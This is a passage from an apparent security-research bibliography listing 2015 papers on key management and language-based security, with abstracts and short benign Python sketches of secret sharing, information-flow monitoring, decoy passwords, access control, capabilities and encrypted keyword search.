Abstract: The need to securely share classified information is a long-standing open problem, especially in large and dynamic environments. Multiple large-scale approaches, such as NATO Object Level Protection (OLP) and Content-based Protection and Release (CPR), address parts of this problem. CPR contains an enforcement paradigm called Cryptographic Access Control (CAC) that enables protection and release policies to be combined cryptographically with content, user and terminal properties (or attributes). The main element of CAC in this case is attribute-based encryption, or ABE. With ABE it is possible to enforce very fine-grained policies, but combining attributes from users and terminals for general policies is cumbersome and not directly possible with existing schemes. We present in this paper a key-management encryption scheme on top of a multi-authority ABE that solves the key pooling problem. Direct applications include a more efficient and general CAC approach, e.g. for CPR, to enable more secure handling of multi-level secure, encrypted content. Indirectly, the more general framework of CAC itself is completed with this functionality.

Keywords: authorisation; cryptography; CAC; CPR; OLP; attribute pooling; attribute-based encryption; content-based protection and release; cryptographic access control; key pooling problem; key-management encryption scheme; multiauthority ABE; multilevel secure encrypted content; object level protection; release policies; terminal properties; Algorithm design and analysis; Cryptography; ABE; CAC; CPR; LW-ABE; MLS; OLP; key management; provable security (ID#: 16-9377)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7158677&isnumber=7158667

 

Manjunath, C.R.; Anand, S.; Nagaraja, G.S., "An Hybrid Secure Scheme for Secure Transmission in Grid Based Wireless Sensor Network," in Advance Computing Conference (IACC), 2015 IEEE International, pp. 472-475, 12-13 June 2015. doi: 10.1109/IADCC.2015.7154753

Abstract: In wireless sensor networks (WSNs), sensor nodes are placed in environments, depending on the application, where secure communication is in high demand. To ensure the privacy and safety of data transactions in the network, unique identification of nodes and secure keys for transport have become major concerns. In order to establish a secure communication channel in the network, the resource constraints of the devices and the scalability of the network must be taken into account when designing secure key management. An approach to secure communication channel establishment is made to suit the functional and architectural features of WSNs. Here, a hybrid key management scheme for symmetric key cryptography is attempted to establish secure communication: an ECC and DH based key management and certificate generation scheme, where keys are generated to decrypt the certificates and establish links for communication in the network. The hybrid scheme is evaluated by simulation in terms of the amount of energy consumed and a security analysis.

Keywords: data privacy; public key cryptography; telecommunication power management; telecommunication security; wireless sensor networks; DH based key management; Diffie-Hellman based key management; ECC; WSN; certificate generation scheme; data transactions; elliptic curve cryptography; grid based wireless sensor network; hybrid key management scheme; hybrid secure scheme; secure communication channel; secure key management; secure transmission; security analysis; sensor nodes; symmetric key cryptography; Base stations; Clustering algorithms; Elliptic curve cryptography; Elliptic curves; Wireless sensor networks; Elliptic Curve Cryptography; Wireless Sensor Networks; certificate; key establishment; scheme; secure communication (ID#: 16-9378)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154753&isnumber=7154658

 

Haddad, Z.; Mahmoud, M.; Taha, S.; Saroit, I.A., "Secure and Privacy-Preserving AMI-Utility Communications Via LTE-A Networks," in Wireless and Mobile Computing, Networking and Communications (WiMob), 2015 IEEE 11th International Conference on, pp. 748-755, 19-21 Oct. 2015. doi: 10.1109/WiMOB.2015.7348037

Abstract: In smart grid Automatic Metering Infrastructure (AMI) networks, smart meters should send consumption data to the utility company (UC) for grid state estimation. Creating a new infrastructure to support this communication is costly and may take a long time, which may delay the deployment of AMI networks. Long Term Evolution-Advanced (LTE-A) networks can be used to support the communications between the AMI networks and the UC. However, since these networks are owned and operated by private companies, the UC cannot ensure the security and privacy of the communications. Moreover, the data sent by AMI networks have different characteristics and requirements than most existing applications in LTE-A networks. For example, there is a strict data delay requirement, data is short and transmitted at short intervals, data is sent at known/predefined time slots, and there is no handover. In this paper, we study enabling secure and privacy-preserving AMI-UC communications via LTE-A networks. The proposed scheme aims to achieve essential security requirements such as authentication, confidentiality, key agreement and data integrity without trusting the LTE-A networks. Furthermore, an aggregation scheme is used to protect the privacy of electricity consumers. It can also reduce the amount of required bandwidth, which can reduce the communication cost. Our evaluations have demonstrated that our proposals are secure and require low communication/computational overhead.

Keywords: Long Term Evolution; data protection; power grids; power system security; power system state estimation; smart meters; telecommunication security; LTE-A network; Long Term Evolution-advanced network; UC; aggregation scheme; communication cost reduction; electricity consumer privacy protection; grid state estimation; privacy-preserving AMI-utility communication; secure AMI-UC communication; smart grid automatic metering infrastructure network; smart meter; utility company; Authentication; Delays; Privacy; Smart grids; Smart meters; Wireless communication; Data Aggregation; Key Management; LTE security and privacy preservation; Smart grid AMI (ID#: 16-9379)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7348037&isnumber=7347915

 

Adeka, M.; Shepherd, S.; Abd-Alhameed, R.; Ahmed, N.A.S., "A Versatile and Ubiquitous Secret Sharing," in Internet Technologies and Applications (ITA), 2015, pp. 466-471, 8-11 Sept. 2015. doi: 10.1109/ITechA.2015.7317449

Abstract: The Versatile and Ubiquitous Secret Sharing System is a cloud data repository secure-access and web-based authentication scheme. It is designed to implement the sharing, distribution and reconstruction of sensitive secret data that could compromise the functioning of an organisation if leaked to unauthorised persons. This is carried out in a secure web environment, globally. It is a threshold secret sharing scheme, designed to extend the human trust security perimeter. The system could be adapted to serve as a cloud data repository and secure data communication scheme. A secret sharing scheme is a method by which a dealer distributes shares of a secret data item to trustees, such that only authorised subsets of the trustees can reconstruct the secret. This paper gives a brief summary of the layout and functions of a 15-page secure server-based website prototype; the main focus of a PhD research effort titled `Cryptography and Computer Communications Security: Extending the Human Security Perimeter through a Web of Trust'. The prototype, which has been successfully tested, has globalised the distribution and reconstruction processes.

Keywords: Internet; cloud computing; message authentication; trusted computing; ubiquitous computing; AdeVersUS3; Adeka's Versatile and Ubiquitous Secret Sharing System; Web based authentication scheme; cloud data repository secure access; human trust security perimeter; secure data communication; secure server-based Website prototype; threshold secret sharing scheme; Computer science; Cryptography; Electrical engineering; IP networks; Prototypes; Radiation detectors; Servers; (k, n)-threshold; authentication; authorised user; cloud data repository; combiner; cryptography; dealer or distributor; human security perimeter; interpolation; key management; participants (trustees); secret sharing (ID#: 16-9380)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7317449&isnumber=7317353
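
A minimal (k, n)-threshold secret-sharing sketch in the spirit of the scheme the abstract describes: a dealer splits a secret among n trustees by evaluating a random polynomial, and any k trustees reconstruct it by Lagrange interpolation over a prime field. The field size and parameters are illustrative; the paper's web-based prototype is not reproduced here.

```python
import secrets

PRIME = 2**127 - 1  # prime field large enough for a 16-byte secret

def split(secret, k, n):
    # Random degree-(k-1) polynomial with the secret as constant term.
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(k - 1)]
    def f(x):
        y = 0
        for c in reversed(coeffs):
            y = (y * x + c) % PRIME
        return y
    return [(x, f(x)) for x in range(1, n + 1)]

def reconstruct(shares):
    # Lagrange interpolation at x = 0 recovers the constant term.
    secret = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = (num * -xj) % PRIME
                den = (den * (xi - xj)) % PRIME
        # pow(den, -1, PRIME) is the modular inverse (Python 3.8+).
        secret = (secret + yi * num * pow(den, -1, PRIME)) % PRIME
    return secret

s = secrets.randbelow(PRIME)
assert reconstruct(split(s, k=3, n=5)[:3]) == s
```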

 

Talawar, S.H.; Hansdah, R.C., "A Protocol for End-to-End Key Establishment During Route Discovery in MANETs," in Advanced Information Networking and Applications (AINA), 2015 IEEE 29th International Conference on, pp. 176-184, 24-27 March 2015. doi: 10.1109/AINA.2015.183

Abstract: An end-to-end shared secret key between two distant nodes in a mobile ad hoc network (MANET) is essential for providing secure communication between them. However, to provide effective security in a MANET, end-to-end key establishment should be secure against both internal and external malicious nodes. An external malicious node does not possess any valid security credential related to the MANET, whereas an internal malicious node possesses some valid security credentials. Most protocols for end-to-end key establishment in MANETs either make the unrealistic assumption that an end-to-end secure channel exists between source and destination or use bandwidth-consuming multi-path schemes. In this paper, we propose a simple and efficient protocol for end-to-end key establishment during route discovery (E2-KDR) in MANETs. Unlike many other existing schemes, the protocol establishes the end-to-end key using trust among the nodes which, during the initial stage, is established using public key certificates issued by an off-line membership-granting authority. However, the use of public keys in the proposed protocol is minimal, to keep it efficient. Since the key is established during the route discovery phase, key establishment time is reduced. The proposed protocol exploits mobility to establish end-to-end keys, and provides a comprehensive solution by making use of symmetric keys for protecting routing control messages and end-to-end communication. Moreover, as the end-to-end keys are established during the route discovery phase, the protocol is on-demand and only necessary keys are established, which makes the protocol storage-scalable. The protocol is shown to be secure using security analysis, and its efficiency is confirmed by the results obtained from simulation experiments.

Keywords: cryptographic protocols; mobile ad hoc networks; multipath channels; private key cryptography; routing protocols; telecommunication security; wireless channels; E2-KDR; MANET; end-to-end secure channel; end-to-end shared secret key; malicious node; mobile ad hoc network; multipath scheme; off-line membership granting authority; protocol storage; public key certificate; route discovery; routing control message protection; secure communication; security analysis; Ad hoc networks; Mobile computing; Public key; Routing; Routing protocols; Key Management; Mobile Ad hoc Network (MANET); Secure Routing (ID#: 16-9381)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7097968&isnumber=7097928


 

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Language Based Security 2015

 

 
SoS Logo

Language Based Security 2015

 

Application-level security is a key to defending against application-level attacks. Because these applications are typically specified and implemented in programming languages, this area is generally known as "language-based security". Research into language-based security focuses on a range of languages and approaches and is relevant to the Science of Security hard problems of resiliency, metrics, and human behavior. The works cited here were presented in 2015.


R. Kusters, T. Truderung, B. Beckert, D. Bruns, M. Kirsten and M. Mohr, "A Hybrid Approach for Proving Noninterference of Java Programs," Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, pp. 305-319. doi: 10.1109/CSF.2015.28

Abstract: Several tools and approaches for proving non-interference properties for Java and other languages exist. Some of them have a high degree of automation or are even fully automatic, but over-approximate the actual information flow and hence may produce false positives. Other tools, such as those based on theorem proving, are precise but may need interaction, and hence analysis is time-consuming. In this paper, we propose a hybrid approach that aims at obtaining the best of both approaches: we use fully automatic analysis as much as possible, and only at places in a program where, due to over-approximation, the automatic approaches fail do we resort to more precise but interactive analysis, where the latter involves the verification only of specific functional properties in certain parts of the program, rather than checking more intricate non-interference properties for the whole program. To illustrate the hybrid approach, in a case study we use this approach - along with the fully automatic tool Joana for checking non-interference properties for Java programs and the theorem prover KeY for the verification of Java programs - as well as the CVJ framework proposed by Kuesters, Truderung, and Graf to establish cryptographic privacy properties for a non-trivial Java program, namely an e-voting system. The CVJ framework allows one to establish cryptographic indistinguishability properties for Java programs by checking (standard) non-interference properties for such programs.

Keywords: Java; program diagnostics; program verification; theorem proving; CVJ framework; Java programs noninterference properties; Joana; KeY theorem prover; automatic analysis; cryptographic privacy properties; e-voting system; functional property verification; hybrid approach; interactive analysis; noninterference property checking; Cryptography; Electronic mail; Electronic voting; Java; Privacy; Standards; code-level cryptographic analysis; language-based security; noninterference; program analysis (ID#: 16-9451)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243741&isnumber=7243713

 

A. Askarov, S. Chong and H. Mantel, "Hybrid Monitors for Concurrent Noninterference," Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, pp. 137-151. doi: 10.1109/CSF.2015.17

Abstract: Controlling confidential information in concurrent systems is difficult, due to covert channels resulting from interaction between threads. This problem is exacerbated if threads share resources at fine granularity. In this work, we propose a novel monitoring framework to enforce strong information security in concurrent programs. Our monitors are hybrid, combining dynamic and static program analysis to enforce security in a sound and rather precise fashion. In our framework, each thread is guarded by its own local monitor, and there is a single global monitor. We instantiate our monitoring framework to support rely-guarantee style reasoning about the use of shared resources, at the granularity of individual memory locations, and then specialize local monitors further to enforce flow-sensitive progress-sensitive information-flow control. Our local monitors exploit rely-guarantee-style reasoning about shared memory to achieve high precision. Soundness of rely-guarantee-style reasoning is guaranteed by all monitors cooperatively. The global monitor is invoked only when threads synchronize, and so does not needlessly restrict concurrency. We prove that our hybrid monitoring approach enforces a knowledge-based progress-sensitive non-interference security condition.

Keywords: concurrency control; data privacy; inference mechanisms; knowledge based systems; program diagnostics; resource allocation; security of data; storage management; concurrent noninterference; concurrent program; concurrent system; confidential information control; covert channel; dynamic program analysis; flow-sensitive progress-sensitive information-flow control; hybrid monitoring approach; knowledge-based progress-sensitive noninterference security condition; memory location; rely-guarantee style reasoning; resource sharing; security enforcement; shared memory; static program analysis; strong information security; thread interaction; thread synchronization; Cognition; Concurrent computing; Instruction sets; Monitoring; Security; Synchronization; Language-based security; hybrid information-flow monitor; information-flow control for concurrent systems (ID#: 16-9452)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243730&isnumber=7243713
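
The paper's monitors combine static and dynamic analysis with rely-guarantee reasoning across threads; the sketch below is far simpler, a purely dynamic, single-threaded information-flow monitor that tracks a LOW/HIGH label per variable and blocks HIGH data at public outputs. Implicit flows and concurrency, central to the paper, are deliberately omitted.

```python
LOW, HIGH = 0, 1

class FlowMonitor:
    def __init__(self):
        self.labels = {}

    def mark_high(self, var):
        self.labels[var] = HIGH

    def assign(self, var, value, sources=()):
        # The target's label is the join (max) of the source labels.
        self.labels[var] = max((self.labels.get(s, LOW) for s in sources),
                               default=LOW)
        return value

    def output_public(self, var, value):
        if self.labels.get(var, LOW) == HIGH:
            raise RuntimeError(f"information-flow violation: {var} is HIGH")
        print(value)

m = FlowMonitor()
secret = m.assign("secret", 42)
m.mark_high("secret")
leak = m.assign("leak", secret + 1, sources=("secret",))
try:
    m.output_public("leak", leak)
except RuntimeError as err:
    print(err)   # the monitor blocks the attempted leak
```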

 

D. Schoepe and A. Sabelfeld, "Understanding and Enforcing Opacity," Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, pp. 539-553. doi: 10.1109/CSF.2015.41

Abstract: This paper puts a spotlight on the specification and enforcement of opacity, a security policy for protecting sensitive properties of system behavior. We illustrate the fine granularity of the opacity policy by location privacy and privacy-preserving aggregation scenarios. We present a general framework for opacity and explore its key differences and formal connections with such well-known information-flow models as non-interference, knowledge-based security, and declassification. Our results are machine-checked and parameterized in the observational power of the attacker, including progress-insensitive, progress-sensitive, and timing-sensitive attackers. We present two approaches to enforcing opacity: a whitebox monitor and a blackbox sampling-based enforcement. We report on experiments with prototypes that utilize state-of-the-art Satisfiability Modulo Theories (SMT) solvers and the random testing tool QuickCheck to establish opacity for the location and aggregation-based scenarios.

Keywords: computability; data privacy; pattern classification; sampling methods; security of data; QuickCheck; SMT; aggregation-based scenarios; blackbox sampling-based enforcement; declassification; formal connections; information-flow models; knowledge-based security; location aggregation-based scenarios; location privacy; opacity policy; privacy-preserving aggregation scenarios; progress-insensitive attackers; progress-sensitive attackers; random testing tool; security policy; sensitive system behavior properties; state-of-the-art satisfiability modulo theories solvers; timing-sensitive attackers; whitebox monitor; Knowledge based systems; Monitoring; Nickel; Privacy; Prototypes; Reactive power; Security; information flow; language-based security (ID#: 16-9453)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243753&isnumber=7243713

 

 

A. Dabrowski, I. Echizen and E. R. Weippl, "Error-Correcting Codes As Source For Decoding Ambiguity," Security and Privacy Workshops (SPW), 2015 IEEE, San Jose, CA, 2015, pp. 99-105. doi: 10.1109/SPW.2015.28

Abstract: Data decoding, format, or language ambiguities have long been known for amusement purposes. Only recently has it come to attention that they also pose a security risk. In this paper, we present decoder manipulations based on deliberately caused ambiguities that exploit the error correction mechanisms used in several popular applications. This can be used to encode data in multiple formats or even the same format with different content. Implementation details of the decoder or environmental differences decide which data the decoder locks onto. This leads to different users receiving different content based on a language decoding ambiguity. In general, ambiguity is not desired; however, in special cases it can be particularly harmful. Format dissectors can make wrong decisions: e.g., a firewall scans based on one format, but the user decodes different, harmful content. We demonstrate this behavior with popular barcodes and argue that it can be used to deliver exploits based on the software installed, or to use probabilistic effects to divert a small percentage of users to fraudulent sites.

Keywords: bar codes; decoding; encoding; error correction codes; fraud; security of data; barcodes; data decoding; data encoding; decoder manipulations; error correction mechanisms; error-correcting codes; format dissectors; fraudulent sites; language decoding ambiguity; security risk; Decoding; Error correction codes; Security; Software; Standards; Synchronization; Visualization; Barcode; Error Correcting Codes; LangSec; Language Security; Packet-in-Packet; Protocol decoding ambiguity; QR; Steganography (ID#: 16-9454)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163213&isnumber=7163193

 

R. Chatterjee, J. Bonneau, A. Juels and T. Ristenpart, "Cracking-Resistant Password Vaults Using Natural Language Encoders," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 481-498. doi: 10.1109/SP.2015.36

Abstract: Password vaults are increasingly popular applications that store multiple passwords encrypted under a single master password that the user memorizes. A password vault can greatly reduce the burden on a user of remembering passwords, but introduces a single point of failure. An attacker that obtains a user's encrypted vault can mount offline brute-force attacks and, if successful, compromise all of the passwords in the vault. In this paper, we investigate the construction of encrypted vaults that resist such offline cracking attacks and force attackers instead to mount online attacks. Our contributions are as follows. We present an attack and supporting analysis showing that a previous design for cracking-resistant vaults -- the only one of which we are aware -- actually degrades security relative to conventional password-based approaches. We then introduce a new type of secure encoding scheme that we call a natural language encoder (NLE). An NLE permits the construction of vaults which, when decrypted with the wrong master password, produce plausible-looking decoy passwords. We show how to build NLEs using existing tools from natural language processing, such as n-gram models and probabilistic context-free grammars, and evaluate their ability to generate plausible decoys. Finally, we present, implement, and evaluate a full, NLE-based cracking-resistant vault system called NoCrack.

Keywords: context-free grammars; cryptography; encoding; natural language processing; probability; NLE; NoCrack; cracking-resistant password vaults; cracking-resistant vault system; encoding scheme security; encrypted vault construction; force attackers; n-gram models; natural language encoders; natural language processing; offline brute-force attacks; offline cracking attacks; password encryption; plausible decoys; plausible-looking decoy passwords; probabilistic context-free grammars; Dictionaries; Encryption; Force; MySpace; Natural languages; Honey Encryption; Language Model; PCFG;  Password Model; Password Vault (ID#: 16-9455)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163043&isnumber=7163005
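
A toy version of the n-gram idea behind a natural language encoder: a character bigram model trained on leaked passwords can sample decoys that look human-chosen. The training list below is a stand-in, and NoCrack's actual encoder, which maps decoys to and from uniform bit strings, is omitted.

```python
import random
from collections import defaultdict

# Stand-in training set; NoCrack trains on large leaked-password corpora.
training = ["password1", "letmein", "dragon99", "sunshine", "monkey12"]

bigrams = defaultdict(list)
for word in training:
    w = "^" + word + "$"              # start/end markers
    for a, b in zip(w, w[1:]):
        bigrams[a].append(b)

def decoy(rng=random):
    # Walk the bigram chain from the start marker to sample a decoy.
    out, c = [], "^"
    while True:
        c = rng.choice(bigrams[c])
        if c == "$" or len(out) >= 16:
            return "".join(out)
        out.append(c)

print([decoy() for _ in range(3)])    # plausible-looking decoy passwords
```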

 

M. Anwar and A. Imran, "Access Control for Multi-tenancy in Cloud-Based Health Information Systems," Cyber Security and Cloud Computing (CSCloud), 2015 IEEE 2nd International Conference on, New York, NY, 2015, pp. 104-110. doi: 10.1109/CSCloud.2015.95

Abstract: Cloud technology can be used to support cost effective, scalable, and well-managed healthcare information systems. However, cloud computing, particularly multitenancy, introduces privacy and security issues related to personal health information (PHI). In this paper, we designed ontological models for healthcare workflow and multi-tenancy, and then applied HIPAA requirements on the models to generate HIPAA-compliant access control policies. We used Semantic Web Rule Language (SWRL) to represent access control policies as rules, and we verified the rules with an OWL-DL reasoner. Additionally, we implemented HIPAA security rules through access control policies in a cloud-based simulated healthcare environment. More specifically, we investigated access control policy specification and enforcement for cloud based healthcare information systems using an open source cloud platform, OpenStack. The results manifest HIPAA compliance through authorization policies that are capable of addressing vulnerabilities of multi-tenancy.

Keywords: authorisation; cloud computing; health care; medical information systems; ontologies (artificial intelligence); public domain software; HIPAA-compliant access control policy; OpenStack platform; PHI; authorization policy; cloud computing; cloud technology; cloud-based health information systems; health care information systems; ontological models; open source cloud platform; personal health information; semantic Web rule language; Access control; Cloud computing; Databases; Insurance; Medical services; Ontologies; HIPAA; access control; health cloud; multitenancy; ontological model; openstack (ID#: 16-9456)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371467&isnumber=7371418
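
A toy attribute-based policy check in the spirit of the paper's HIPAA-derived rules. The paper expresses its rules in SWRL and enforces XACML-style policies on OpenStack; none of that machinery appears here, and the roles, actions, and "treating relationship" condition are illustrative assumptions.

```python
POLICY = [
    # (role, action, condition on the request)
    ("physician", "read_phi",  lambda req: req["patient"] in req["treats"]),
    ("physician", "write_phi", lambda req: req["patient"] in req["treats"]),
    ("billing",   "read_phi",  lambda req: req["purpose"] == "payment"),
]

def is_permitted(request):
    # Permit if any policy rule matches role, action, and condition.
    return any(role == request["role"] and action == request["action"]
               and cond(request)
               for role, action, cond in POLICY)

req = {"role": "physician", "action": "read_phi",
       "patient": "p17", "treats": {"p17", "p42"}, "purpose": "treatment"}
print(is_permitted(req))   # True: treating physician may read PHI
```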

 

R. N. M. Watson et al., "CHERI: A Hybrid Capability-System Architecture for Scalable Software Compartmentalization," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 20-37. doi: 10.1109/SP.2015.9

Abstract: CHERI extends a conventional RISC Instruction-Set Architecture, compiler, and operating system to support fine-grained, capability-based memory protection to mitigate memory-related vulnerabilities in C-language TCBs. We describe how CHERI capabilities can also underpin a hardware-software object-capability model for application compartmentalization that can mitigate broader classes of attack. Prototyped as an extension to the open-source 64-bit BERI RISC FPGA soft-core processor, FreeBSD operating system, and LLVM compiler, we demonstrate multiple orders-of-magnitude improvement in scalability, simplified programmability, and resulting tangible security benefits as compared to compartmentalization based on pure Memory-Management Unit (MMU) designs. We evaluate incrementally deployable CHERI-based compartmentalization using several real-world UNIX libraries and applications.

Keywords: data protection; operating systems (computers); program compilers; reduced instruction set computing; software architecture; C-language TCB; CHERI; LLVM compiler; RISC instruction-set architecture; capability-based memory protection; hardware-software object-capability model; hybrid capability-system architecture; operating system; software compartmentalization; Hardware; Kernel; Libraries; Reduced instruction set computing; Registers; Security; CHERI processor; capability system; computer architecture; memory protection; object capabilities; software compartmentalization (ID#: 16-9457)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163016&isnumber=7163005
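
CHERI enforces capabilities in hardware; purely as a software analogy, the class below models a capability as an unforgeable (base, length, permissions) triple that every load, store, and derivation is checked against, with derivation only ever shrinking bounds and permissions.

```python
class Capability:
    def __init__(self, mem, base, length, perms=frozenset({"r", "w"})):
        self._mem, self._base, self._len, self._perms = mem, base, length, perms

    def restrict(self, offset, length, perms):
        # Monotonic: a derived capability can only shrink bounds/permissions.
        if offset < 0 or offset + length > self._len or not perms <= self._perms:
            raise PermissionError("cannot amplify a capability")
        return Capability(self._mem, self._base + offset, length, perms)

    def load(self, i):
        if "r" not in self._perms or not 0 <= i < self._len:
            raise PermissionError("load outside capability bounds")
        return self._mem[self._base + i]

    def store(self, i, v):
        if "w" not in self._perms or not 0 <= i < self._len:
            raise PermissionError("store outside capability bounds")
        self._mem[self._base + i] = v

mem = bytearray(64)
cap = Capability(mem, base=0, length=64)
sub = cap.restrict(offset=8, length=4, perms=frozenset({"r"}))
sub.load(3)        # in bounds, readable: fine
# sub.load(4)      # would raise: out of bounds
# sub.store(0, 1)  # would raise: no write permission
```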

 

Xiaoran Zhu, Yuanmin Xu, Jian Guo, Xi Wu, Huibiao Zhu and Weikai Miao, "Formal Verification of PKMv3 Protocol Using DT-Spin," Theoretical Aspects of Software Engineering (TASE), 2015 International Symposium on, Nanjing, 2015, pp. 71-78. doi: 10.1109/TASE.2015.20

Abstract: WiMax (Worldwide Interoperability for Microwave Access, IEEE 802.16) is a standard-based wireless technology, which uses Privacy Key Management (PKM) protocol to provide authentication and key management. Three versions of PKM protocol have been released and the third version (PKMv3) strengthens the security by enhancing the message management. In this paper, a formal analysis of PKMv3 protocol is presented. Both the subscriber station (SS) and the base station (BS) are modeled as processes in our framework. Discrete time describes the lifetime of the Authorization Key (AK) and the Transmission Encryption Key (TEK), which are produced by BS. Moreover, the PKMv3 model is constructed through the discrete-time PROMELA (DT-PROMELA) language and the tool DT-Spin implements the PKMv3 model with lifetime. Finally, we simulate communications between SS and BS and some properties are verified, i.e. liveness, succession and message consistency, which are extracted from PKMv3 and specified using Linear Temporal Logic (LTL) formulae and assertions. Our model provides a basis for further verification of PKMv3 protocol with time characteristic.

Keywords: WiMax; authorisation; computer network security; cryptographic protocols; formal verification; message authentication; private key cryptography; temporal logic; AK; BS; DT-PROMELA language; DT-Spin; DT-spin; IEEE 802.16; LTL; PKM protocol; PKMv3 model; PKMv3 protocol; SS; TEK; WiMax; Worldwide Interoperability for Microwave Access; authentication; authorization key; base station; discrete-time PROMELA language; formal verification; linear temporal logic; message management; privacy key management protocol; security; standard-based wireless technology; subscriber station; third version; transmission encryption key; Authentication; Authorization; Encryption; IEEE 802.16 Standard; Protocols; DT-Spin; Discrete-time PROMELA; PKMv3 protocol; modeling; verification (ID#: 16-9458)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7307736&isnumber=7307716

 

S. Sadki and H. El Bakkali, "An Approach for Privacy Policies Negotiation in Mobile Health-Cloud Environments," Cloud Technologies and Applications (CloudTech), 2015 International Conference on, Marrakech, 2015, pp. 1-6. doi: 10.1109/CloudTech.2015.7336983

Abstract: Mobile technologies continue to improve patients' quality of care. Particularly, with the emergence of Cloud-based mobile services and applications, patients can easily communicate with their physicians and receive the care they deserve. However, due to the increased number of privacy threats in mobile and Cloud computing environments, maximizing patients' control over their data becomes a necessity. Thus, formal languages to express their privacy preferences are needed. Besides, because of the diversity of actors involved in patient's care, conflict among privacy policies can take place. In this paper, we present an approach that aims to resolve the problem of conflicting privacy policies based on a Security Policy Negotiation Framework. The major particularity of our solution is that it considers the patient to be a crucial actor in the negotiation process. The different steps of our approach are illustrated through an example of three conflicting privacy policies with different privacy languages.

Keywords: cloud computing; data privacy; health care ;medical computing; mobile computing; cloud computing; cloud-based mobile services; formal language; mobile health-cloud environment; mobile technology; patient care; privacy policy negotiation; security policy negotiation framework; Cloud computing; Data privacy; Medical services; Mobile communication; Organizations; Privacy; Security; Cloud computing; mobile health; policy negotiation; privacy; privacy policy (ID#: 16-9459)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336983&isnumber=7336956

 

H. T. Poon and A. Miri, "An Efficient Conjunctive Keyword and Phrase Search Scheme for Encrypted Cloud Storage Systems," Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, New York City, NY, 2015, pp. 508-515. doi: 10.1109/CLOUD.2015.74

Abstract: There has been increasing interest in the area of privacy-protected searching as industries continue to adopt cloud technologies. Much of the recent efforts have been towards incorporating more advanced searching techniques. Although many have proposed solutions for conjunctive keyword search, it is only recently that researchers began exploring phrase search over encrypted data. In this paper, we present a scheme that incorporates both functionalities. Our solution makes use of symmetric encryption, which provides computational and storage efficiency over schemes based on public key encryption. By considering the statistical properties of natural languages, we were able to design indexes that significantly reduce storage cost when compared to existing solutions. Our solution allows for simple ranking of results and requires a low storage cost while providing document and keyword security. By using both the index and the encrypted documents to performs searches, our scheme is also currently the only phrase search scheme capable of searching for non-indexed keywords.

Keywords: cloud computing; data protection; natural language processing; public key cryptography; storage management; advanced searching techniques; cloud technology; conjunctive keyword search; encrypted cloud storage systems; keyword security; natural languages; phrase search scheme; privacy-protected searching; public key encryption; statistical property; storage cost reduction; symmetric encryption; Cloud computing; Encryption; Indexes; Keyword search; Servers; Conjunctive keyword search; Encryption; Phrase search; Privacy; Security (ID#: 16-9460)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214084&isnumber=7212169
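
A sketch of the symmetric-searchable-index idea underlying such schemes: the server stores only HMAC tags of keywords per document, so it can intersect posting lists for a conjunctive query without learning the keywords. The paper's phrase-search layer, result ranking, and non-indexed-keyword search are omitted, and the key handling is illustrative.

```python
import hashlib
import hmac
import secrets

KEY = secrets.token_bytes(32)          # symmetric key held by the client

def tag(word):
    # Deterministic keyword tag; the server never sees the plaintext word.
    return hmac.new(KEY, word.encode(), hashlib.sha256).hexdigest()

def build_index(docs):
    index = {}
    for doc_id, text in docs.items():
        for word in set(text.lower().split()):
            index.setdefault(tag(word), set()).add(doc_id)
    return index          # this (tag -> doc ids) map is what the server holds

def conjunctive_search(index, words):
    postings = [index.get(tag(w), set()) for w in words]
    return set.intersection(*postings) if postings else set()

docs = {1: "secure cloud storage", 2: "cloud key management",
        3: "secure key exchange"}
index = build_index(docs)
print(conjunctive_search(index, ["secure", "cloud"]))   # {1}
```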

 

E. M. Songhori, S. U. Hussain, A. R. Sadeghi, T. Schneider and F. Koushanfar, "TinyGarble: Highly Compressed and Scalable Sequential Garbled Circuits," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 411-428. doi: 10.1109/SP.2015.32

